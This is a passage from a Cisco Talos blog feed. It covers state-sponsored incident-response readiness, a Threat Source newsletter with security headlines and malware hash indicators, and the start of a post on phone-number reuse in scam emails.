rel="noreferrer noopener"><u>joint advisory</u></a>&#xA0;on living-off-the-land techniques recommends&#xA0;maintaining&#xA0;continuous baselines across network traffic, user behavior, administrative tool usage, and&#xA0;<a href="https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/identifying-and-mitigating-living-off-the-land-techniques" rel="noreferrer noopener"><u>application activity</u></a>. The emphasis on &quot;continuously&quot; is not incidental. A baseline established once and left unattended can generate more problems than it resolves, creating false confidence that normal has been adequately defined, when in reality theorganization has moved on. Baselines need to reflect seasonal patterns, organizational changes, infrastructure updates, and role transitions. When an administrator changes teams, their access patterns shift. When a new application is deployed, new NetFlow patterns emerge. If the baseline fails to keep pace, genuine threats blend into an outdated picture of normal, and anomaly detection becomes a source of noise rather than signal.</p><p>Statistical anomaly detection can surface the low-and-slow deviations characteristic of&#xA0;state-sponsored&#xA0;lateral movement, but tuning is an ongoing commitment, and false positive management carries a real operational cost that should not be underestimated.&#xA0;</p><p>State-sponsored&#xA0;actors do not typically&#xA0;maintain&#xA0;access through malware alone. Once inside, they move through identity infrastructure. Privileged access management deserves explicit treatment: administrative accounts should&#xA0;operate&#xA0;on a tiered model that prevents domain administrator credentials from being exposed on workstations, and service accounts should be scoped to the minimum access their function requires. Detection logic needs to account for credential abuse patterns that do not involve any malicious tooling. Pass-the-hash and pass-the-ticket attacks use legitimate authentication protocols and will not trigger antivirus.&#xA0;Kerberoasting, where an attacker requests service tickets for offline cracking, is visible in Kerberos event logs but only if those logs are collected and someone is looking. Anomalous authentication patterns, such as accounts authenticating at unusual hours, from unusual sources, or against systems they have never previously accessed, are among the more reliable behavioral signals available, provided the baseline exists to contextualize them.&#xA0;</p><h3 id="operational-security-opsec">Operational&#xA0;security&#xA0;(OPSEC)&#xA0;</h3><p>If a&#xA0;state-sponsored&#xA0;breach is confirmed, the response needs to assume the adversary can see internal communications. If they have domain admin access, they can&#xA0;likely read&#xA0;email. If they have compromised a collaboration platform, they may be able to see the incident response channel.&#xA0;Here are some of the common aspects that should be considered:&#xA0;&#xA0;</p><ul><li><strong>Out-of-band</strong>&#xA0;<strong>communications</strong>: Use encrypted channels on separate, unconnected devices to ensure investigative communications&#xA0;remain&#xA0;outside the compromised infrastructure.&#xA0;</li><li><strong>Compartmentalization</strong>: Limit knowledge of the investigation to essential personnel only, as each&#xA0;additional&#xA0;person aware of the response is a potential vector for the adversary to detect the investigation.&#xA0;</li><li><strong>Pre-established</strong>&#xA0;<strong>authority</strong>&#xA0;<strong>contacts</strong>:&#xA0;Maintain&#xA0;established relationships with national authorities, CERTs, and intelligence agencies before a crisis occurs, rather than&#xA0;identifying&#xA0;the right contacts during an active incident.&#xA0;</li></ul><p>Organizations should also have a pre-established relationship with national authorities, including the relevant contacts at national CERTs or intelligence agencies, rather than trying to find the right person during a crisis.&#xA0;</p><h3 id="ot-and-industrial-control-system-ics-readiness">OT and&#xA0;Industrial Control System&#xA0;(ICS)&#xA0;readiness&#xA0;</h3><p>For organizations with&#xA0;OT&#xA0;environments, the threat model extends beyond what most IT-centric IR plans address.&#xA0;</p><p>The IT-OT boundary that appears on network diagrams is a logical construct, and&#xA0;state-sponsored&#xA0;actors treat it as a lateral movement path rather than a barrier. Volt Typhoon demonstrated this in concrete terms by moving from compromised IT infrastructure toward OT-adjacent systems, including those controlling&#xA0;<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" rel="noreferrer noopener"><u>water treatment plants and electrical substations</u></a>. Through 2025, the group progressed from IT reconnaissance to directly interacting with OT network-connected devices and extracting sensor and&#xA0;<a href="https://www.dataflowx.com/post/salt-typhoon-and-volt-typhoon-what-critical-infrastructure-operators-need-to-know" rel="noreferrer noopener"><u>operational data</u></a>,&#xA0;representing&#xA0;a transition from passive espionage to what amounts to a sabotage-ready foothold,&#xA0;maintained&#xA0;quietly and positioned for activation when circumstances require it.&#xA0;Important aspects are:&#xA0;&#xA0;</p><ul><li><strong>Availability as a</strong>&#xA0;<strong>safety</strong>&#xA0;<strong>constraint:</strong>&#xA0;OT systems often cannot be taken offline for forensic imaging, as production shutdowns in energy, water, or manufacturing carry significant safety and economic consequences.Investigations must work around live systems.&#xA0;</li><li><strong>Patching</strong>&#xA0;<strong>constraints:</strong>&#xA0;Many OT systems run legacy software that cannot be updated without vendor involvement, making virtual patching through IDS/IPS rules the only&#xA0;viable&#xA0;near-term remediation option.&#xA0;</li><li><strong>Insufficient</strong>&#xA0;<strong>software-defined</strong>&#xA0;<strong>segmentation:</strong>&#xA0;IT/OT boundaries relying solely on software-defined controls are inadequate, as a compromised account with sufficient privileges can reconfigure them.&#xA0;</li><li><strong>Hardware-enforced</strong>&#xA0;<strong>unidirectional</strong>&#xA0;<strong>gateways:</strong>&#xA0;Data diodes provide a physical, deterministic guarantee of network separation that cannot be overridden by a compromised account or software misconfiguration.&#xA0;</li><li><strong>Regulatory</strong>&#xA0;<strong>alignment:</strong>&#xA0;Both CISA and the UK&apos;s NCSC recommend engineering-based, deterministic&#xA0;<a href="https://industrialcyber.co/reports/waterfall-threat-report-2026-finds-ransomware-slowdown-masks-deeper-shift-toward-nation-state-attacks-on-critical-infrastructure/" rel="noreferrer noopener"><u>protections for OT boundaries</u></a>&#xA0;as the baseline standard.&#xA0;</li></ul><h3 id="supply-chain-readiness">Supply&#xA0;chain&#xA0;readiness&#xA0;</h3><p>Vendors, software dependencies, and network infrastructure are all extensions of the trust boundary, and preparing for&#xA0;<a href="https://www.silobreaker.com/blog/cyber-threats/supply-chain-attacks-in-2025-a-month-by-month-summary/" rel="noreferrer noopener"><u>supply chain compromise</u></a>&#xA0;means understanding those dependencies and having response procedures ready before one of them is exploited.&#xA0;Some critical measures are as follows:&#xA0;</p><ul><li><strong>Software Bill of Materials (SBOM):</strong>&#xA0;Maintain&#xA0;an SBOM for all applications and&#xA0;monitor&#xA0;it against vulnerability databases using automated tooling, connected directly to infrastructure.&#xA0;</li><li><strong>Vendor</strong>&#xA0;<strong>access</strong>&#xA0;<strong>inventory:</strong>&#xA0;Map which&#xA0;<a href="https://www.darktrace.com/blog/breaking-down-nation-state-attacks-on-supply-chains" rel="noreferrer noopener"><u>systems each third party can access</u></a>, through what mechanisms, and at what privilege level.&#xA0;</li><li><strong>Contractual</strong>&#xA0;<strong>incident</strong>&#xA0;<strong>notification:</strong>&#xA0;Enforce 24-hour disclosure clauses in vendor contracts to ensure&#xA0;timely&#xA0;notification of compromise, preventing containment windows from closing before the organization is aware.&#xA0;</li><li><strong>Pre-authorized IR</strong>&#xA0;<strong>procedures:</strong>&#xA0;Define in advance what gets revoked, what gets isolated, and who makes the call for each&#xA0;vendor&#xA0;integration,&#xA0;eliminating&#xA0;delays while an adversary continues to&#xA0;operate.&#xA0;</li><li><strong>Firmware</strong>&#xA0;<strong>inventory:</strong>&#xA0;Maintain&#xA0;a firmware inventory with patch status for every network device, including firewalls, routers, switches, and VPN concentrators.&#xA0;</li><li><strong>Legacy and</strong>&#xA0;<strong>end-of-life</strong>&#xA0;<strong>(EOL)</strong>&#xA0;<strong>devices:</strong>&#xA0;Apply compensating controls such as network isolation, enhanced monitoring, and virtual patching to devices that can no longer receive patches, as they&#xA0;represent&#xA0;supply chain risk sitting inside the perimeter.&#xA0;</li></ul><h3 id="insider-threat-readiness">Insider&#xA0;threat&#xA0;readiness&#xA0;</h3><p>In the&#xA0;state-sponsored&#xA0;context, the insider threat is not about a disgruntled employee stealing files. It is a structured intelligence operation that uses the hiring process itself as an attack vector, and preparation requires a cross-functional program spanning security, HR, legal, and finance because the indicators span all four domains.&#xA0;</p><p>For planted insiders, the&#xA0;<a href="https://www.nbcnews.com/investigations/north-korea-it-worker-scheme-nisos-fbi-rcna245025" rel="noreferrer noopener"><u>DPRK IT worker scheme</u></a>&#xA0;being the most documented example, hiring verification needs to go beyond standard background checks.&#xA0;This includes live, multi-stage video interviews with liveness verification that current deepfake technology cannot reliably defeat&#xA0;(for now), digital footprint validation across independent data sources, detection of VoIP phone numbers and shared credentials across applications, and cross-referencing candidate information for the kinds of inconsistencies a fabricated identity cannot fully conceal.&#xA0;</p><p>For all insider categories, behavioral baselines and data loss prevention policies should be in place before an incident occurs. Legal pre-authorization for employee monitoring is also important to&#xA0;establish&#xA0;ahead of time. Trying to build that legal framework during an active investigation will either delay the response or create legal exposure.&#xA0;</p><h2 id="why-your-ir-plan-needs-revisiting">Why&#xA0;your&#xA0;IR&#xA0;plan&#xA0;needs&#xA0;revisiting&#xA0;</h2><p>If&#xA0;your&#xA0;current&#xA0;IR&#xA0;plan covers malware and&#xA0;ransomware&#xA0;but&#xA0;typically it&#xA0;does not address supply chain compromise, insider threats, or&#xA0;<a href="https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/identifying-and-mitigating-living-off-the-land-techniques" rel="noreferrer noopener"><u>living-off-the-land</u></a>&#xA0;techniques. Most IR plans simply&#xA0;reflect&#xA0;a threat&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer noopener"><u>landscape that has already shifted</u></a>. These gaps should be addressed through distinct playbooks, each with its own containment&#xA0;decision&#xA0;trees, evidence collection procedures, legal coordination requirements, and recovery verification steps. Each playbook should be tested through tabletop exercises built&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer noopener"><u>around realistic scenarios.</u></a>&#xA0;</p><p>One aspect of&#xA0;state-sponsored&#xA0;incident response sets it apart from criminal incident response&#xA0;is that&#xA0;the adversary may be observing the response in real time, will likely attempt to regain access after eviction, and the diplomatic, legal, and intelligence dimensions of the incident extend well beyond the security operations center.&#xA0;</p><p>The containment decision in a&#xA0;state-sponsored&#xA0;incident is rarely straightforward. Treating it as a binary choice between immediate isolation and inaction understates the complexity involved. In a criminal incident, early containment is&#xA0;almost always&#xA0;the correct approach. In a&#xA0;state-sponsored&#xA0;incident, premature containment can&#xA0;eliminate&#xA0;the opportunity to understand the full scope of the adversary&apos;s access,&#xA0;forfeit&#xA0;the ability to collect intelligence on their infrastructure, and signal to the adversary that they have been detected. That signal may trigger accelerated action on their&#xA0;objectives&#xA0;before defenses are fully in place.&#xA0;</p><p>The deliberate choice to&#xA0;monitor&#xA0;silently while the adversary&#xA0;operates&#xA0;introduces its own legal, ethical, and operational risks. That decision should never be made unilaterally by the SOC. It requires input from legal counsel and senior leadership, and in many cases a conversation with national authorities before it is exercised.&#xA0;</p><p>The incident response plan should define in advance who holds decision authority over containment timing, what criteria govern the transition from silent monitoring to active containment, and what evidence collection must be completed before containment begins. Tabletop exercises that do not incorporate this decision point are not adequately preparing teams for the reality of&#xA0;state-sponsored&#xA0;incident response.&#xA0;</p><h3 id="post-incident">Post-incident&#xA0;</h3><p>After containment and recovery, the work is not finished. The intelligence collected during the incident has value beyond the organization that was&#xA0;targeted, and&#xA0;sharing it through ISACs and government channels contributes to a broader defensive picture that&#xA0;benefits&#xA0;the entire sector. Internally, the after-action review should map findings to MITRE ATT&amp;CK, not as a compliance exercise but as a structured way to&#xA0;identify&#xA0;where detection failed, where response was too slow, and where controls need to be strengthened. That review should feed directly into updated detection logic, revised access controls, and adjusted monitoring priorities.&#xA0;</p><p>Threat hunting should not stop when the incident is closed. A&#xA0;state-sponsored&#xA0;actor that has been evicted will often&#xA0;attempt&#xA0;to regain access using different infrastructure or modified techniques, and sustained hunting focused on the specific&#xA0;actor&apos;s&#xA0;TTPs is the most reliable way to catch that early. Tabletop exercises should also be updated to reflect what was learned, so the next time a similar scenario plays out, the team is not relearning the same lessons under pressure.&#xA0;</p><p>None of this is new guidance, but in the context of&#xA0;state-sponsored&#xA0;threats, where the adversary is persistent, well-resourced, and likely to return, these activities stop being procedural housekeeping and become direct preparation for the next intrusion.&#xA0;</p><h3 id="where-to-start-when-you-have-low-budget-minimal-staff-and-competing-priorities">Where to start&#xA0;when you have low budget, minimal staff, and competing priorities&#xA0;</h3><p>Everything covered above assumes an organization can invest in logging, baselines, segmentation, supply chain controls, and dedicated IR planning in parallel.&#xA0;In reality, most&#xA0;security teams are&#xA0;operating&#xA0;under hiring freezes, flat budgets, and competing priorities, and the guidance to &quot;do all of this&quot; is not actionable without a sense of sequencing. The following is a pragmatic order of operations for teams that need to make meaningful progress without a step-change in resourcing.&#xA0;</p><p>Start with&#xA0;visibility,&#xA0;because you cannot defend what you cannot see. Before buying&#xA0;new&#xA0;tooling, turn on what you already own. Enabling Windows command-line logging (Event ID 4688), PowerShell script block logging (Event ID 4104), and centralized log forwarding costs nothing in licensing and addresses the single largest gap most organizations have. If logs are not being collected and&#xA0;retained&#xA0;centrally, no amount of downstream investment will compensate.&#xA0;</p><p>After this, prioritize identity over endpoints. State-sponsored actors move through credentials, not malware that can be easily fingerprinted, blocked,&#xA0;and made public through sandboxes. Enforcing&#xA0;multi-factor authentication (MFA)&#xA0;on all administrative accounts, implementing tiered admin models, and reviewing service account privileges typically delivers more risk reduction per hour invested than any endpoint initiative. These are configuration changes, not procurement cycles.&#xA0;</p><p>Next,&#xA0;focus&#xA0;monitoring where the adversary&#xA0;has to&#xA0;go. If Sysmon everywhere is not&#xA0;feasible,&#xA0;then deploy it on domain controllers, identity infrastructure, externally facing systems, and critical servers. An adversary pursuing meaningful&#xA0;objectives&#xA0;will eventually touch these systems, and concentrated visibility on them is more valuable than thin visibility everywhere.&#xA0;</p><p>The underlying principle is that state-sponsored readiness is not a single large investment. It is a sequence of smaller decisions where the early ones disproportionately&#xA0;determine&#xA0;whether the later ones are ever useful. Visibility and identity come first. Everything else builds on them.</p>]]></content:encoded></item><item><title><![CDATA[Unplug your way to better code]]></title><description><![CDATA[Cybersecurity concepts — logs, packets, DNS exfiltration, and more — are usually intangible, and its practitioners are prone to mental fatigue, Amy takes a second to yell at you to go touch grass.]]></description><link>https://blog.talosintelligence.com/unplug-your-way-to-better-code/</link><guid isPermaLink="false">69fb91cb525fa5000158eb68</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Amy Ciminnisi]]></dc:creator><pubDate>Thu, 07 May 2026 18:00:40 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_source.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_source.jpg" alt="Unplug your way to better code"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.</p><p>Hey, you. Yeah, you! The person endlessly scrolling or typing away at their computer. Did you touch grass today? It&apos;s just an expression, but if nature&#x2019;s your thing, that works just fine.</p><p>What I do mean is that due to the nature of the field, cybersecurity is incredibly intangible. You can&#x2019;t reach out and touch your logs, or the packets traversing your network, or the concept of DNS exfiltration... and if you tried, you&#x2019;d just feel the smooth surface of your computer screen. (What a boring texture.) Spending all our time in the abstract can create some serious mental fatigue.</p><p>My point is that there&#x2019;s something powerful to be said about engaging with the physical world. When we engage in a tactile hobby, we give our brains a hard reset. By moving from the abstract to the physical, our brains get the time and space to process the complex problems we&#x2019;ve been staring at, often leading to the &#x201C;aha!&#x201D; moment that never comes when you&apos;re trying to force it.</p><p>The other week, I was working in the Talos office with the Creative team. It was a quiet afternoon, people&#x2019;s energy sapped by stomachs full of Mediterranean food. That was swiftly interrupted (in the best way) when Joe Marshall came over into our work area with his miniature painting kit, broke it open, and started teaching us how to drybrush 3D-printed figurines. Everyone immediately came alive. While I didn&#x2019;t partake (I know, &#x201C;Do as I say, not as I do&#x201D;), it reminded me of how revitalized I feel when I get outside for a walk during lunch or spend 10 minutes knitting in silence between meetings. There&#x2019;s nothing to focus on but the feel of the yarn between your fingers, the clacking of the needles, and the repetitive motions that result in a physical object you can wear and fish for compliments about.</p><p>Speaking of, do you think the vest I knit is cool? All compliments can be sent to me on LinkedIn, and I refuse to accept any negative comments. (Critiques are fine.)</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/vest-transparent.png" class="kg-image" alt="Unplug your way to better code" loading="lazy" width="2000" height="889" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/vest-transparent.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/vest-transparent.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/vest-transparent.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/vest-transparent.png 2400w" sizes="(min-width: 720px) 720px"></figure><p>Ahem... anyway. Go on a walk without your earbuds, listen to the wind through the leaves, ask a stranger to pet their dog, watch a pigeon bop its head around, and reach out to touch a cool-looking rock or the lichen on a tree. I hear you saying, &quot;That&#x2019;s some tree-hugging bullshit,&#x201D; and counter you with, &#x201C;Just humor me, okay? What&#x2019;s the worst that could happen?&#x201D;</p><p>If you&#x2019;re more of an inside person, the goal might be to find a physical anchor for your technical interest. Maybe it&#x2019;s building a mechanical keyboard from scratch &#x2014; feeling the weight of the switches and hearing the click of the keycaps. Maybe it&#x2019;s a complicated LEGO set. Even something as simple as making espresso or organizing your bookshelf can provide that sensory feedback your brain is craving.</p><p>If you&apos;re not currently facing a life-altering deadline, take 10 minutes and try it now. The rest of the newsletter isn&#x2019;t going anywhere, I promise.</p><p>When you pay attention to the noises you hear, the colors you see, and the textures under your fingertips, you might come back to your laptop refreshed, focused, and ready to solve the next problem.</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos has recently expanded our threat&#xA0;intelligence capabilities to track phone numbers as critical indicators of compromise (IOCs) in&#xA0;scam&#xA0;emails.&#xA0;<a href="https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/" rel="noreferrer noopener"><u>Our latest research</u></a>&#xA0;reveals that attackers heavily favor API-driven VoIP numbers to execute high-volume, cost-effective Telephone-Oriented Attack Delivery (TOAD) campaigns. To evade detection, these threat actors rotate through sequential blocks of numbers, use strategic cool-down periods, and recycle the exact same digits across completely unrelated lures and impersonated brands.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>Tracking ephemeral sender email addresses is a losing game, but phone numbers are the true operational anchors for these organized&#xA0;scam&#xA0;call centers. Because attackers reuse these numbers across multiple document types and brand impersonations, defenders who&#xA0;cluster&#xA0;this telephony infrastructure can expose the broader network of malicious activity. Understanding these reuse patterns gives defenders a much-needed edge in mapping out and dismantling these operations before users are manipulated into handing over sensitive data.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Security teams should shift their focus toward clustering&#xA0;scam&#xA0;lures based on shared phone numbers and prioritize real-time reputation monitoring to flag high-risk infrastructure. Deploying an AI-powered email security solution like Cisco Secure Email Threat Defense can also help evaluate different portions of incoming emails to catch these targeted threats. A full list of indicators of compromise (IOCs) associated with these campaigns can be found&#xA0;<a href="https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/" rel="noreferrer noopener"><u>in the blog</u></a>.</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>DigiCert</strong>&#xA0;<strong>revokes</strong>&#xA0;<strong>certificates</strong>&#xA0;<strong>after</strong>&#xA0;<strong>support</strong>&#xA0;<strong>portal</strong>&#xA0;<strong>hack</strong>&#xA0;<br>The attack, the company said in a detailed&#xA0;report, occurred on April 2, when a threat actor targeted DigiCert&#x2019;s support team with a malicious payload delivered via a customer chat channel, disguised as a screenshot. (<a href="https://www.securityweek.com/digicert-revokes-certificates-after-support-portal-hack/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Ubuntu services hit by outages after DDoS attack</strong>&#xA0;<br>The DDoS-for-hire service in this case claims to power attacks&#xA0;in excess of&#xA0;3.5&#xA0;Tbps, which is about half of the bandwidth of a cyberattack that&#xA0;Cloudflare last year&#xA0;called the &#x201C;largest DDoS attack ever recorded.&#x201D; (<a href="https://techcrunch.com/2026/05/01/ubuntu-services-hit-by-outages-after-ddos-attack/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>TechCrunch</u></a>)&#xA0;</p><p><strong>Canvas maker Instructure reveals data breach</strong>&#xA0;<br>Instructure said the actors accessed &#x201C;certain identifying information of users&#x201D; at affected institutions, including names, email addresses, student ID numbers, and user communications. (<a href="https://www.techradar.com/pro/security/canvas-maker-instructure-reveals-data-breach-confirms-user-personal-information-leaked" rel="noreferrer noopener"><u>Tech Radar</u></a>)&#xA0;</p><p><strong>Exploitation of &#x201C;Copy Fail&#x201D; Linux vulnerability begins</strong>&#xA0;<br>Threat actors are exploiting a recently disclosed Linux kernel vulnerability leading to root shell access, the US cybersecurity agency CISA warns. Dubbed Copy&#xA0;Fail,&#xA0;the security defect&#xA0;impacts&#xA0;all Linux distributions since 2017. (<a href="https://www.securityweek.com/exploitation-of-copy-fail-linux-vulnerability-begins/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Student hacked Taiwan high-speed rail to trigger emergency brakes</strong>&#xA0;<br>According to&#xA0;local reports, the student halted four trains for 48 minutes by using software-defined radio (SDR) communications and handheld radios to&#xA0;transmit&#xA0;a high-priority &#x201C;General Alarm&#x201D; signal, triggering emergency braking procedures. (<a href="https://www.bleepingcomputer.com/news/security/student-hacked-taiwan-high-speed-rail-to-trigger-emergency-brakes/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://cs.co/IRTales-2026-Q1" rel="noreferrer noopener"><strong><u>Tales</u></strong>&#xA0;<strong><u>from the Frontlines</u></strong></a>&#xA0;<br>In this briefing,&#xA0;we&#x2019;ll&#xA0;share behind-the-scenes insights from the most critical and high-impact incidents we responded to in the last quarter. This&#xA0;isn&apos;t&#xA0;a&#xA0;report&#xA0;walkthrough;&#xA0;it&apos;s&#xA0;a&#xA0;look at what really happened, how we handled it, and what it means for your organization.&#xA0;</p><p><a href="https://blog.talosintelligence.com/uat-8302/" rel="noreferrer noopener"><strong><u>UAT-8302 and its box full of malware</u></strong></a>&#xA0;<br>Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus&#xA0;APT&#xA0;group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.&#xA0;</p><p><a href="https://blog.talosintelligence.com/cloudz-pheno-infostealer/" rel="noreferrer noopener"><strong><u>CloudZ RAT potentially steals OTP messages using Pheno plugin</u></strong></a>&#xA0;<br>Cisco Talos&#xA0;discovered&#xA0;an intrusion,&#xA0;active since&#xA0;at least&#xA0;January 2026,&#xA0;where an unknown attacker implanted a&#xA0;CloudZ&#xA0;remote access&#xA0;tool (RAT)&#xA0;and&#xA0;a previously undocumented plugin called &#x201C;Pheno.&#x201D;&#xA0;</p><p><a href="https://www.buzzsprout.com/2018149/episodes/19135351" rel="noreferrer noopener"><strong><u>The trust paradox: How attackers weaponize legitimate SaaS platforms</u></strong></a>&#xA0;<br>In this episode of Talos Takes, Amy Ciminnisi sits down with researcher Diana Brown to discuss the rise of &quot;platform-as-a-proxy&quot; (PAP) attacks.&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;VID001.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201**&#xA0;</p><p><strong>SHA256:</strong>&#xA0;<strong>96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256:</strong>&#xA0;<strong>e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</strong>&#xA0;&#xA0;<br>MD5: dbd8dbecaa80795c135137d69921fdba&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</u></a>&#xA0;&#xA0;<br>Example Filename: u112417.dat&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Variant:MalwareXgenMisc.29d4.1201&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</strong>&#xA0;<br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg**&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[Insights into the clustering and reuse of phone numbers in scam emails]]></title><description><![CDATA[Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.]]></description><link>https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/</link><guid isPermaLink="false">69fa0d8a1abe200001ff3a84</guid><category><![CDATA[On The Radar]]></category><category><![CDATA[Cisco Talos Email Threat Prevention]]></category><dc:creator><![CDATA[Omid Mirzaei]]></dc:creator><pubDate>Wed, 06 May 2026 10:00:12 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/phone-number-scams.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco&#xA0;Talos has recently&#xA0;started to collect and gather intelligence around phone numbers&#xA0;within emails&#xA0;as an&#xA0;additional&#xA0;indicator of compromise (IOC).&#xA0;In this blog, we discuss&#xA0;new insights into&#xA0;in-the-wild&#xA0;phone number reuse&#xA0;in&#xA0;scam&#xA0;emails.&#xA0;&#xA0;</li><li>According to&#xA0;Talos&#x2019;&#xA0;observations,&#xA0;the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective&#xA0;scam&#xA0;operations that are difficult to trace.&#xA0;</li><li>Attackers&#xA0;maintain&#xA0;operational continuity by rotating through sequential blocks of phone numbers and&#xA0;utilizing&#xA0;strategic cool-down periods, with a median phone number lifespan of&#xA0;14&#xA0;days, to effectively evade reputation-based security filters.&#xA0;</li><li>Threat actors try to maximize their reach by recycling the same phone numbers across diverse,&#xA0;seemingly 